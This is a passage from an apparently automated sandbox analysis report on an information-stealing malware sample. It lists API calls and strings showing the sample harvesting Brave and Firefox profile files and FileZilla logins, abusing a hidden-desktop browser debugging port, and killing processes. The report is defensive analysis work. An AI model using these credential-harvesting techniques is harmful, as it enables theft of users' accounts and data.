                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                              • String ID: Brave$Preferences$\Brave\Preferences
                              • API String ID: 1346089424-1230934161
                              • Opcode ID: 04c3eb8e18a6c4323b22e557f7087923e51de70a3602787c750e4a58f79b7021
                              • Instruction ID: b912444bddc011db7945659b407fe716bc3b5d6a45beb6a1b8b4ce5520d3f503
                              • Opcode Fuzzy Hash: 04c3eb8e18a6c4323b22e557f7087923e51de70a3602787c750e4a58f79b7021
                              • Instruction Fuzzy Hash: D0527A70A113069FDB21AF68D88DAAE7FF9AF44308F046528F986B7255DB35DC05CB90
                              Function 00E360D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E360FF
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E36152
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E36185
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E361B5
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E361F0
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E36223
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E36233
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$InternetOpen
                              • String ID: "$------
                              • API String ID: 2041821634-2370822465
                              • Opcode ID: 9820154ce23b5f1fb51abd6ca520898034848d210a51af03ec968c871d311dd9
                              • Instruction ID: 9cb8698f717e1b67967ce070820c2edc28275bdddb031d58103061ac2f8ab3b2
                              • Opcode Fuzzy Hash: 9820154ce23b5f1fb51abd6ca520898034848d210a51af03ec968c871d311dd9
                              • Instruction Fuzzy Hash: 98528B71900315AFDB21EFB4D849AAE7BF9AF44304F15A428F985BB251DB35EC01CBA0
                              Function 00E46B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E46B9D
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E46BCD
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E46BFD
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E46C2F
                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00E46C3C
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E46C43
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00E46C5A
                              • lstrlen.KERNEL32(00000000), ref: 00E46C65
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46CA8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46CCF
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 00E46CE2
                              • lstrlen.KERNEL32(00000000), ref: 00E46CED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46D30
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46D57
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00E46D6A
                              • lstrlen.KERNEL32(00000000), ref: 00E46D75
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46DB8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46DDF
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00E46DF2
                              • lstrlen.KERNEL32(00000000), ref: 00E46E01
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46E49
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46E71
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00E46E94
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E46EA8
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00E46EC9
                              • LocalFree.KERNEL32(00000000), ref: 00E46ED4
                              • lstrlen.KERNEL32(?), ref: 00E46F6E
                              • lstrlen.KERNEL32(?), ref: 00E46F81
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 2641759534-2314656281
                              • Opcode ID: a3e88cd16c91f2961d03ad34a565ee0cce56ad2532e9aa5bce385431adfd8489
                              • Instruction ID: 51997d53689d2c8ae64cf0f730bfbee1b0febfd57eb9406363e32a27ca833ea1
                              • Opcode Fuzzy Hash: a3e88cd16c91f2961d03ad34a565ee0cce56ad2532e9aa5bce385431adfd8489
                              • Instruction Fuzzy Hash: D502BF70A11315AFDB20ABB4EC4DAAE7BB9AF05708F146418F986F7241DB35D901CBA1
                              Function 00E44B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E44B51
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44B74
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E44B7F
                              • lstrlen.KERNEL32(00E64CA8), ref: 00E44B8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44BA7
                              • lstrcat.KERNEL32(00000000,00E64CA8), ref: 00E44BB3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44BDE
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00E44BFA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: prefs.js
                              • API String ID: 2567437900-3783873740
                              • Opcode ID: 58d6b7b32c7e8bb8255121bdba881947231a2eabb97e3c1e9c68f2bc27b0e5a2
                              • Instruction ID: b3e0b394725aa1cfbaeeb1db43bd7d887b5a014336cab6baafd2a8c89b6c3afe
                              • Opcode Fuzzy Hash: 58d6b7b32c7e8bb8255121bdba881947231a2eabb97e3c1e9c68f2bc27b0e5a2
                              • Instruction Fuzzy Hash: 33924F71A01701CFDB24CF29E548B69B7F5AF44318F2990ADE849AB3A6D776DC42CB40
                              Function 00E41250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E41291
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E412B4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E412BF
                              • lstrlen.KERNEL32(00E64CA8), ref: 00E412CA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E412E7
                              • lstrcat.KERNEL32(00000000,00E64CA8), ref: 00E412F3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4131E
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00E4133A
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E4135C
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E41376
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E413AF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E413D7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E413E2
                              • lstrlen.KERNEL32(00E61794), ref: 00E413ED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4140A
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E41416
                              • lstrlen.KERNEL32(?), ref: 00E41423
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41443
                              • lstrcat.KERNEL32(00000000,?), ref: 00E41451
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4147A
                              • StrCmpCA.SHLWAPI(?,00D2E000), ref: 00E414A3
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E414E4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4150D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41535
                              • StrCmpCA.SHLWAPI(?,00D2E158), ref: 00E41552
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E41593
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E415BC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E415E4
                              • StrCmpCA.SHLWAPI(?,00D2DFA0), ref: 00E41602
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41633
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4165C
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E41685
                              • StrCmpCA.SHLWAPI(?,00D2DFB8), ref: 00E416B3
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E416F4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4171D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41745
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E41796
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E417BE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E417F5
                              • FindNextFileA.KERNEL32(00000000,?), ref: 00E4181C
                              • FindClose.KERNEL32(00000000), ref: 00E4182B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                              • String ID:
                              • API String ID: 1346933759-0
                              • Opcode ID: bc6ba3070ce1f91f9499cdfa9e31fd0fc63ffffa14ebaefde33bd34d795bc2a9
                              • Instruction ID: 3e3220b84c51346f6fb8181cc36018a63dbf5fce26bd384d28433fdc814d5595
                              • Opcode Fuzzy Hash: bc6ba3070ce1f91f9499cdfa9e31fd0fc63ffffa14ebaefde33bd34d795bc2a9
                              • Instruction Fuzzy Hash: 2D125D71A103069FDF24AF78E889AAE7BF8AF44308F15556CF986A7250DB34DC45CB90
                              Function 00E4CBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00E4CBFC
                              • FindFirstFileA.KERNEL32(?,?), ref: 00E4CC13
                              • lstrcat.KERNEL32(?,?), ref: 00E4CC5F
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E4CC71
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E4CC8B
                              • wsprintfA.USER32 ref: 00E4CCB0
                              • PathMatchSpecA.SHLWAPI(?,00D28C48), ref: 00E4CCE2
                              • CoInitialize.OLE32(00000000), ref: 00E4CCEE
                                • Part of subcall function 00E4CAE0: CoCreateInstance.COMBASE(00E5B110,00000000,00000001,00E5B100,?), ref: 00E4CB06
                                • Part of subcall function 00E4CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00E4CB46
                                • Part of subcall function 00E4CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 00E4CBC9
                              • CoUninitialize.COMBASE ref: 00E4CD09
                              • lstrcat.KERNEL32(?,?), ref: 00E4CD2E
                              • lstrlen.KERNEL32(?), ref: 00E4CD3B
                              • StrCmpCA.SHLWAPI(?,00E5CFEC), ref: 00E4CD55
                              • wsprintfA.USER32 ref: 00E4CD7D
                              • wsprintfA.USER32 ref: 00E4CD9C
                              • PathMatchSpecA.SHLWAPI(?,?), ref: 00E4CDB0
                              • wsprintfA.USER32 ref: 00E4CDD8
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00E4CDF1
                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00E4CE10
                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 00E4CE28
                              • CloseHandle.KERNEL32(00000000), ref: 00E4CE33
                              • CloseHandle.KERNEL32(00000000), ref: 00E4CE3F
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E4CE54
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4CE94
                              • FindNextFileA.KERNEL32(?,?), ref: 00E4CF8D
                              • FindClose.KERNEL32(?), ref: 00E4CF9F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                              • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 3860919712-2388001722
                              • Opcode ID: 4d8f456c8800d8d2948232b872e0072609f5548a1ca2559be4505fae472e271d
                              • Instruction ID: 8287d313b1ff9bcaca1320cf548143df10b62f3130f21d63df298c26c0f6274c
                              • Opcode Fuzzy Hash: 4d8f456c8800d8d2948232b872e0072609f5548a1ca2559be4505fae472e271d
                              • Instruction Fuzzy Hash: FEC17271A003089FDB60DF64EC49AEE77B9BF44304F109599F649A7284EB35AE44CFA0
                              Function 00E39770 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 234stringsleepCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 00E39790
                              • lstrcat.KERNEL32(?,?), ref: 00E397A0
                              • lstrcat.KERNEL32(?,?), ref: 00E397B1
                              • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00E397C3
                              • memset.MSVCRT ref: 00E397D7
                                • Part of subcall function 00E53E70: lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E53EA5
                                • Part of subcall function 00E53E70: lstrcpy.KERNEL32(00000000,00D2F010), ref: 00E53ECF
                                • Part of subcall function 00E53E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,00E3134E,?,0000001A), ref: 00E53ED9
                              • wsprintfA.USER32 ref: 00E39806
                              • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00E39827
                              • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00E39844
                                • Part of subcall function 00E546A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00E546B9
                                • Part of subcall function 00E546A0: Process32First.KERNEL32(00000000,00000128), ref: 00E546C9
                                • Part of subcall function 00E546A0: Process32Next.KERNEL32(00000000,00000128), ref: 00E546DB
                                • Part of subcall function 00E546A0: StrCmpCA.SHLWAPI(?,?), ref: 00E546ED
                                • Part of subcall function 00E546A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E54702
                                • Part of subcall function 00E546A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00E54711
                                • Part of subcall function 00E546A0: CloseHandle.KERNEL32(00000000), ref: 00E54718
                                • Part of subcall function 00E546A0: Process32Next.KERNEL32(00000000,00000128), ref: 00E54726
                                • Part of subcall function 00E546A0: CloseHandle.KERNEL32(00000000), ref: 00E54731
                              • memset.MSVCRT ref: 00E39862
                              • lstrcat.KERNEL32(00000000,?), ref: 00E39878
                              • lstrcat.KERNEL32(00000000,?), ref: 00E39889
                              • lstrcat.KERNEL32(00000000,00E64B60), ref: 00E3989B
                              • memset.MSVCRT ref: 00E398AF
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E398D4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E39903
                              • StrStrA.SHLWAPI(00000000,00D2F3C8), ref: 00E39919
                              • lstrcpyn.KERNEL32(010693D0,00000000,00000000), ref: 00E39938
                              • lstrlen.KERNEL32(?), ref: 00E3994B
                              • wsprintfA.USER32 ref: 00E3995B
                              • lstrcpy.KERNEL32(?,00000000), ref: 00E39971
                              • memset.MSVCRT ref: 00E39986
                              • Sleep.KERNEL32(00001388), ref: 00E399E7
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E31557
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E31579
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E3159B
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E315FF
                                • Part of subcall function 00E392B0: strlen.MSVCRT ref: 00E392E1
                                • Part of subcall function 00E392B0: strlen.MSVCRT ref: 00E392FA
                                • Part of subcall function 00E392B0: strlen.MSVCRT ref: 00E39399
                                • Part of subcall function 00E392B0: strlen.MSVCRT ref: 00E393E6
                                • Part of subcall function 00E54740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00E54759
                                • Part of subcall function 00E54740: Process32First.KERNEL32(00000000,00000128), ref: 00E54769
                                • Part of subcall function 00E54740: Process32Next.KERNEL32(00000000,00000128), ref: 00E5477B
                                • Part of subcall function 00E54740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E5479C
                                • Part of subcall function 00E54740: TerminateProcess.KERNEL32(00000000,00000000), ref: 00E547AB
                                • Part of subcall function 00E54740: CloseHandle.KERNEL32(00000000), ref: 00E547B2
                                • Part of subcall function 00E54740: Process32Next.KERNEL32(00000000,00000128), ref: 00E547C0
                                • Part of subcall function 00E54740: CloseHandle.KERNEL32(00000000), ref: 00E547CB
                              • CloseDesktop.USER32(?), ref: 00E39A1C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
